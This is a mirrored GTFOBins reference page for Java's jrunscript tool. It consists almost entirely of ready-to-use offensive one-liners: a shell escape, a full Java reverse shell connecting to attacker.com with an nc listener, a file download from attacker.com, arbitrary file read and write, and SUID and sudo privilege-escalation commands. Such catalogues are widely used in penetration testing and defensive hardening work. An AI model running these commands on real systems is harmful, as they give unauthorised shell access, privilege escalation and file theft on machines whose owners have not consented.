mirror/ GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-06-04 13:36:01 +02:00
Code Issues
GTFOBins.github.io/_gtfobins/jrunscript.md
2020-06-10 23:04:59 +02:00

1.8 KiB
Raw Blame History

description functions
This tool is installed starting with Java SE 6.
shell reverse-shell file-download file-write file-read suid sudo
code
jrunscript -e "exec('/bin/sh -c $@|sh _ echo sh <$(tty) >$(tty) 2>$(tty)')"
description code
Run `nc -l -p 12345` on the attacker box to receive the shell. export RHOST=attacker.com export RPORT=12345 jrunscript -e 'var host='"'""$RHOST""'"'; var port='"$RPORT"'; var p=new java.lang.ProcessBuilder("/bin/bash", "-i").redirectErrorStream(true).start(); var s=new java.net.Socket(host,port); var pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream(); var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){ while(pi.available()>0)so.write(pi.read()); while(pe.available()>0)so.write(pe.read()); while(si.available()>0)po.write(si.read()); so.flush();po.flush(); java.lang.Thread.sleep(50); try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'
description code
Fetch a remote file via HTTP GET request. URL=http://attacker.com/file_to_get LFILE=file_to_save jrunscript -e "cp('$URL','$LFILE')"
code
jrunscript -e 'var fw=new java.io.FileWriter("./file_to_write"); fw.write("DATA"); fw.close();'
code
jrunscript -e 'br = new BufferedReader(new java.io.FileReader("file_to_read")); while ((line = br.readLine()) != null) { print(line); }'
description code
This has been found working in macOS but failing on Linux systems. ./jrunscript -e "exec('/bin/sh -pc $@|sh${IFS}-p _ echo sh -p <$(tty) >$(tty) 2>$(tty)')"
code
sudo jrunscript -e "exec('/bin/sh -c $@|sh _ echo sh <$(tty) >$(tty) 2>$(tty)')"